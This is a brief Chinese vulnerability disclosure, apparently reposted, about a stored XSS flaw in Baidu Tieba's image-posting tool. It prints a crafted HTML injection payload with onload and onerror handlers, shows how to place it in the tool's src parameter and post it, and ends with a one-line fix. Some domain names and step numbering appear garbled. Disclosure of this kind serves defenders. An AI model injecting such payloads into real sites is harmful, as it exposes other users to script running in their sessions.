贴图神器上传存在XSS 漏洞
1.先构造代码: "><img class="BDE_Smiley" src=http://up.2cto测试数据/2013/0810/20130810112854130.png" pic_ext="png" width="30" height="30" onload="alert(1)"><img src="#" pic_ext="jpeg" onerror="$(".pic_src_wrapper").css("display","none")"><a
3.http://tieba.baidu测试数据/photo/shenqi?title=&src=http%3A%2F%2FHdhCmsTestbaidu测试数据%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper&pic[0]=http%3A%2F%2Fhimg.bdimg测试数据%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
(这个是贴吧神器地址)
4.讲构造好的代码放入&src=连接的后面
5.得到
&pic[0]=http%3A%2F%2Fhimg.bdimg测试数据%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
6.然后回复或者发布主题,可以产生XSS
修复方案:
过滤符号"\"
查看更多关于百度贴吧贴图神器上传存储型XSS及修复 - 网站安的详细内容...